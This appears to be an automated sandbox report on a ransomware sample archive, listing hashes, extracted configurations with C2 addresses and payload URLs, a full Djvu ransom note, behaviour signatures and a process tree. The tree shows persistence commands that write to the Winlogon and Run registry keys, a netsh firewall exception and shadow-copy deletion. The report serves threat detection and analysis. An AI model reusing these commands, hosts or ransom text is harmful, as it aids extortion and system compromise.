Analysis
-
max time kernel
670s -
max time network
682s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-10-2024 20:34
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00440.7z
Resource
win10v2004-20241007-en
Errors
General
-
Target
RNSM00440.7z
-
Size
83.7MB
-
MD5
075245de36e675fca5b3b7bbbe2559aa
-
SHA1
1c194f80535d39509f318bb6cee62b904bd3ec7d
-
SHA256
3505d0b242e1b4ffa9d11c5769494ea7314ec48dcb27b1b34900f60a10430249
-
SHA512
052d0c44f6d618b4a3ceaae700f7d0fe4fb720965e797c210d9d1fab6e75ff0b905ca2a0dd6cb7fe2838c7f835f89e2a9b23522c7a5c5d09f531ded6f02e3a91
-
SSDEEP
1572864:Fr0PvDw4YpeQwkYquZmWyVbU2lGzZmPA7IGIxjumOahRDjPAT60olU+SbBWvDzF9:GPrBYBYqVWyVo2lGVmAkZuB8NE6BlU+J
Malware Config
Extracted
crimsonrat
134.119.181.142
130.5.26.108
104.144.198.105
Extracted
C:\Users\Admin\Downloads\UFVgTf_readme_.txt
avaddon
Extracted
djvu
http://asvb.top/nddddhsspen6/get.php
-
extension
.paas
-
offline_id
LQbDo3EfIVHxGuJOWRJdmxgY66rD6kiyqz4tzyt1
-
payload_url
http://asvb.top/files/penelop/updatewin1.exe
http://asvb.top/files/penelop/updatewin2.exe
http://asvb.top/files/penelop/updatewin.exe
http://asvb.top/files/penelop/3.exe
http://asvb.top/files/penelop/4.exe
http://asvb.top/files/penelop/5.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-B0FsLNO3fN Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0300ewgfDd
Extracted
F:\ukRcI_readme_.txt
avaddon
http://avaddongun7rngel.onion
http://avaddonbotrxmuyl.onion
Extracted
netwire
haija.mine.nu:1339
-
activex_autorun
false
-
copy_executable
false
-
delete_original
false
-
host_id
C4
-
keylogger_dir
%AppData%\Logs\
-
lock_executable
false
-
offline_keylogger
true
-
password
qays1122
-
registry_autorun
false
-
use_mutex
false
Extracted
C:\Program Files\readme.txt
conti
http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/
https://contirecovery.best
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
prometheus
http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD
Signatures
-
Avaddon
Ransomware-as-a-service first released in June 2020 and currently expanding its userbase among criminal actors.
-
Avaddon payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000023be4-445.dat family_avaddon behavioral1/files/0x0008000000023be3-443.dat family_avaddon -
Contains code to disable Windows Defender 3 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/files/0x0008000000023be2-439.dat disable_win_def behavioral1/memory/1192-1394-0x0000000000980000-0x000000000099A000-memory.dmp disable_win_def behavioral1/memory/1712-441-0x0000000000130000-0x0000000000150000-memory.dmp disable_win_def -
Conti Ransomware
Ransomware generally thought to be a successor to Ryuk.
-
CrimsonRAT main payload 1 IoCs
resource yara_rule behavioral1/files/0x0008000000023bb1-372.dat family_crimsonrat -
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
Detect ZGRat V2 2 IoCs
resource yara_rule behavioral1/memory/1448-279-0x0000000008AD0000-0x0000000008B14000-memory.dmp family_zgrat_v2 behavioral1/memory/4772-1956-0x0000000004D90000-0x0000000004E28000-memory.dmp family_zgrat_v2 -
Detected Djvu ransomware 2 IoCs
resource yara_rule behavioral1/memory/3340-1420-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3340-1419-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
GandCrab payload 2 IoCs
resource yara_rule behavioral1/memory/4432-453-0x0000000001FA0000-0x0000000001FB7000-memory.dmp family_gandcrab behavioral1/memory/4432-452-0x0000000000400000-0x0000000000460000-memory.dmp family_gandcrab -
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
NetWire RAT payload 2 IoCs
resource yara_rule behavioral1/memory/5116-2193-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/5116-2192-0x0000000000400000-0x0000000000433000-memory.dmp netwire -
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6300 2444 wmic.exe 158 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6316 2444 wmic.exe 158 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6264 2444 wmic.exe 158 -
Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
-
Thanos Ransomware
Ransomware-as-a-service (RaaS) sold through underground forums.
-
Thanos executable 1 IoCs
resource yara_rule behavioral1/files/0x0008000000023be2-439.dat family_thanos_ransomware -
Clears Windows event logs 1 TTPs 4 IoCs
pid Process 10080 wevtutil.exe 11140 wevtutil.exe 12272 wevtutil.exe 14908 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 32 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 13316 powershell.exe 10224 powershell.exe 14728 powershell.exe 11968 powershell.exe 11048 powershell.exe 10032 powershell.exe 9276 powershell.exe 10604 powershell.exe 7272 powershell.exe 10136 powershell.exe 2164 powershell.exe 6148 powershell.exe 6556 powershell.exe 4788 powershell.exe 13228 powershell.exe 14780 powershell.exe 11444 powershell.exe 11148 powershell.exe 9428 powershell.exe 12504 powershell.exe 13676 powershell.exe 7808 powershell.exe 2416 powershell.exe 10060 powershell.exe 12388 powershell.exe 12452 powershell.exe 832 powershell.exe 10180 powershell.exe 11524 powershell.exe 4288 powershell.exe 2740 powershell.exe 4832 powershell.exe -
Creates new service(s) 2 TTPs
-
pid Process 6252 wbadmin.exe -
Downloads MZ/PE file
-
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.
description flow ioc HTTP URL 978 http://live.sysinternals.com/PsExec64.exe -
Modifies Windows Firewall 2 TTPs 12 IoCs
pid Process 14888 netsh.exe 5744 netsh.exe 9908 netsh.exe 7744 netsh.exe 5948 netsh.exe 8588 netsh.exe 13088 netsh.exe 9748 netsh.exe 3648 netsh.exe 6664 netsh.exe 12080 netsh.exe 6800 netsh.exe -
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x000700000002492f-33572.dat acprotect -
Executes dropped EXE 4 IoCs
pid Process 2896 HEUR-Trojan-Ransom.MSIL.Blocker.gen-1f884d02b8e20ce595eb81f4073ac7428818b38717645748c3cd24991573fcd4.exe 4772 HEUR-Trojan-Ransom.MSIL.Blocker.gen-508e4e5e5c1f3a2dc3ac302bbdebf4111bb642c88264cdb67d8eefe79eea9d5e.exe 4612 HEUR-Trojan-Ransom.MSIL.Blocker.gen-690a7d0423879b09d450dbe183bddf072b7599a66c890f4933114717e5bdd263.exe 1848 HEUR-Trojan-Ransom.MSIL.Blocker.gen-7129b9e68d3651a62d5c091058b99edb39387da22c60a5aa2632476ab824ce16.exe -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 7604 icacls.exe 9252 icacls.exe 10940 icacls.exe 8920 icacls.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/memory/4536-334-0x0000000006B00000-0x0000000006B28000-memory.dmp agile_net -
Uses the VBS compiler for execution 1 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs
flow ioc 981 pastebin.com 366 raw.githubusercontent.com 968 discord.com 970 discord.com 982 pastebin.com 983 raw.githubusercontent.com 1246 pastebin.com 1251 raw.githubusercontent.com 85 raw.githubusercontent.com 86 raw.githubusercontent.com 971 discord.com -
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 110 api.2ip.ua 117 api.2ip.ua 656 api.2ip.ua 965 ifconfig.me 966 ifconfig.me -
pid Process 9624 arp.exe 13012 arp.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 5200 tasklist.exe -
resource yara_rule behavioral1/memory/10616-17479-0x0000000000400000-0x0000000000430000-memory.dmp upx behavioral1/files/0x0008000000023f05-22694.dat upx behavioral1/memory/10616-23253-0x0000000000400000-0x0000000000430000-memory.dmp upx behavioral1/files/0x000700000002492f-33572.dat upx behavioral1/memory/10148-33610-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/files/0x00070000000257d0-39746.dat upx behavioral1/files/0x0008000000025c74-49110.dat upx -
Launches sc.exe 21 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 6908 sc.exe 7368 sc.exe 5316 sc.exe 8288 sc.exe 312 sc.exe 1980 sc.exe 12172 sc.exe 13760 sc.exe 7780 sc.exe 5948 sc.exe 14372 sc.exe 6716 sc.exe 8148 sc.exe 1160 sc.exe 6216 sc.exe 11568 sc.exe 5904 sc.exe 7920 sc.exe 8176 sc.exe 7860 sc.exe 4864 sc.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 8720 VHO-Trojan-Ransom.Win32.Purga.gen-a43b765e32162dad5373f9dc42bf94c11f1a67c154c24623cdcceb78d9fd20b0.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0007000000025778-39178.dat pyinstaller -
Program crash 11 IoCs
pid pid_target Process procid_target 3768 4872 WerFault.exe 132 1164 4432 WerFault.exe 148 10828 2528 WerFault.exe 527 8564 14616 WerFault.exe 623 12940 14616 WerFault.exe 623 14924 14968 WerFault.exe 616 536 5148 WerFault.exe 714 14548 12184 WerFault.exe 725 5340 4772 WerFault.exe 707 13652 8256 WerFault.exe 1133 14668 10616 WerFault.exe 499 -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-508e4e5e5c1f3a2dc3ac302bbdebf4111bb642c88264cdb67d8eefe79eea9d5e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-7129b9e68d3651a62d5c091058b99edb39387da22c60a5aa2632476ab824ce16.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 14768 PING.EXE 12924 cmd.exe 8828 cmd.exe 11804 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe -
Interacts with shadow copies 3 TTPs 31 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 11336 vssadmin.exe 10636 vssadmin.exe 5648 vssadmin.exe 13528 vssadmin.exe 6660 vssadmin.exe 8524 vssadmin.exe 7848 vssadmin.exe 6688 vssadmin.exe 8668 vssadmin.exe 9584 vssadmin.exe 14912 vssadmin.exe 12756 vssadmin.exe 2876 vssadmin.exe 9312 vssadmin.exe 8332 vssadmin.exe 13324 vssadmin.exe 12764 vssadmin.exe 6060 vssadmin.exe 7304 vssadmin.exe 8188 vssadmin.exe 3432 vssadmin.exe 5628 vssadmin.exe 10572 vssadmin.exe 12152 vssadmin.exe 13068 vssadmin.exe 9884 vssadmin.exe 13836 vssadmin.exe 9816 vssadmin.exe 8880 vssadmin.exe 14320 vssadmin.exe 3772 vssadmin.exe -
Kills process with taskkill 55 IoCs
pid Process 8036 taskkill.exe 3016 taskkill.exe 6540 taskkill.exe 11712 taskkill.exe 8128 taskkill.exe 1596 taskkill.exe 8380 taskkill.exe 6096 taskkill.exe 8832 taskkill.exe 10288 taskkill.exe 12196 taskkill.exe 14876 taskkill.exe 8580 taskkill.exe 13268 taskkill.exe 15212 taskkill.exe 6148 taskkill.exe 8624 taskkill.exe 15312 taskkill.exe 11308 taskkill.exe 3144 taskkill.exe 7588 taskkill.exe 2244 taskkill.exe 1076 taskkill.exe 6132 taskkill.exe 936 taskkill.exe 3144 taskkill.exe 6536 taskkill.exe 14020 taskkill.exe 10996 taskkill.exe 8572 taskkill.exe 8188 taskkill.exe 6244 taskkill.exe 4968 taskkill.exe 12132 taskkill.exe 8976 taskkill.exe 8228 taskkill.exe 2576 taskkill.exe 8608 taskkill.exe 1980 taskkill.exe 7816 taskkill.exe 4888 taskkill.exe 7856 taskkill.exe 8792 taskkill.exe 8276 taskkill.exe 8568 taskkill.exe 7992 taskkill.exe 5992 taskkill.exe 5352 taskkill.exe 12448 taskkill.exe 5044 taskkill.exe 12376 taskkill.exe 5956 taskkill.exe 1912 taskkill.exe 804 taskkill.exe 7972 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4496 reg.exe -
Runs .reg file with regedit 2 IoCs
pid Process 12176 regedit.exe 4984 regedit.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 14768 PING.EXE 11804 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7436 schtasks.exe 12764 schtasks.exe 13556 schtasks.exe 12328 schtasks.exe 10068 schtasks.exe 868 schtasks.exe 7900 schtasks.exe 9960 schtasks.exe 13996 schtasks.exe 13388 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1084 7zFM.exe 4796 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeRestorePrivilege 1084 7zFM.exe Token: 35 1084 7zFM.exe Token: SeSecurityPrivilege 1084 7zFM.exe Token: SeDebugPrivilege 4008 taskmgr.exe Token: SeSystemProfilePrivilege 4008 taskmgr.exe Token: SeCreateGlobalPrivilege 4008 taskmgr.exe Token: SeDebugPrivilege 4796 taskmgr.exe Token: SeSystemProfilePrivilege 4796 taskmgr.exe Token: SeCreateGlobalPrivilege 4796 taskmgr.exe Token: 33 4008 taskmgr.exe Token: SeIncBasePriorityPrivilege 4008 taskmgr.exe Token: SeDebugPrivilege 3504 powershell.exe Token: SeDebugPrivilege 2896 HEUR-Trojan-Ransom.MSIL.Blocker.gen-1f884d02b8e20ce595eb81f4073ac7428818b38717645748c3cd24991573fcd4.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1084 7zFM.exe 1084 7zFM.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4008 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe 4796 taskmgr.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 4008 wrote to memory of 4796 4008 taskmgr.exe 106 PID 4008 wrote to memory of 4796 4008 taskmgr.exe 106 PID 3504 wrote to memory of 1248 3504 powershell.exe 122 PID 3504 wrote to memory of 1248 3504 powershell.exe 122 PID 1248 wrote to memory of 2896 1248 cmd.exe 123 PID 1248 wrote to memory of 2896 1248 cmd.exe 123 PID 1248 wrote to memory of 4772 1248 cmd.exe 124 PID 1248 wrote to memory of 4772 1248 cmd.exe 124 PID 1248 wrote to memory of 4772 1248 cmd.exe 124 PID 1248 wrote to memory of 4612 1248 cmd.exe 125 PID 1248 wrote to memory of 4612 1248 cmd.exe 125 PID 1248 wrote to memory of 1848 1248 cmd.exe 126 PID 1248 wrote to memory of 1848 1248 cmd.exe 126 PID 1248 wrote to memory of 1848 1248 cmd.exe 126
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00440.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1084
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Blocker.gen-1f884d02b8e20ce595eb81f4073ac7428818b38717645748c3cd24991573fcd4.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-1f884d02b8e20ce595eb81f4073ac7428818b38717645748c3cd24991573fcd4.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Blocker.gen-508e4e5e5c1f3a2dc3ac302bbdebf4111bb642c88264cdb67d8eefe79eea9d5e.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-508e4e5e5c1f3a2dc3ac302bbdebf4111bb642c88264cdb67d8eefe79eea9d5e.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4772 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Kzsmqbviyukxy.vbs"4⤵PID:5660
-
C:\Users\Admin\AppData\Local\Temp\Fskzynvjwsheidm_universal_patch_v6.0_by_dfox.exe"C:\Users\Admin\AppData\Local\Temp\Fskzynvjwsheidm_universal_patch_v6.0_by_dfox.exe"5⤵PID:5944
-
-
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exeC:\Users\Admin\AppData\Local\Temp\InstallUtil.exe4⤵PID:5116
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Blocker.gen-690a7d0423879b09d450dbe183bddf072b7599a66c890f4933114717e5bdd263.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-690a7d0423879b09d450dbe183bddf072b7599a66c890f4933114717e5bdd263.exe3⤵
- Executes dropped EXE
PID:4612 -
C:\Windows\svchost.exe"C:\Windows\svchost.exe"4⤵PID:3692
-
C:\Windows\SYSTEM32\netsh.exenetsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:3648
-
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Blocker.gen-7129b9e68d3651a62d5c091058b99edb39387da22c60a5aa2632476ab824ce16.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-7129b9e68d3651a62d5c091058b99edb39387da22c60a5aa2632476ab824ce16.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1848 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\updates.exe,"4⤵PID:6528
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\updates.exe,"5⤵PID:4688
-
-
-
C:\Users\Admin\AppData\Roaming\updates.exe"C:\Users\Admin\AppData\Roaming\updates.exe"4⤵PID:10672
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\updates.exe,"5⤵PID:13676
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\updates.exe,"6⤵PID:12844
-
-
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"5⤵PID:5296
-
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Blocker.gen-9440b5ca9e37624ce03a04238091c2390f11ebef50490f178a52e3170086e064.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-9440b5ca9e37624ce03a04238091c2390f11ebef50490f178a52e3170086e064.exe3⤵PID:4536
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ammn" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\ammn.exe"4⤵PID:5160
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ammn" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\ammn.exe"5⤵PID:6376
-
-
-
C:\Users\Admin\AppData\Roaming\ammn.exe"C:\Users\Admin\AppData\Roaming\ammn.exe"4⤵PID:7788
-
C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"5⤵PID:8956
-
-
C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"5⤵PID:5616
-
C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"6⤵PID:10264
-
C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"7⤵PID:12632
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"5⤵PID:14492
-
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c38cbcb74d9dd769954e43cadb836599c69ecf10e1d068d70f00bc3a95028b96.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-c38cbcb74d9dd769954e43cadb836599c69ecf10e1d068d70f00bc3a95028b96.exe3⤵PID:1160
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Crypren.gen-a43f39a2e4b9136f2ad0b3706ff858adcce1bba6ab3b7ab65c016d47cd3f7b89.exeHEUR-Trojan-Ransom.MSIL.Crypren.gen-a43f39a2e4b9136f2ad0b3706ff858adcce1bba6ab3b7ab65c016d47cd3f7b89.exe3⤵PID:1448
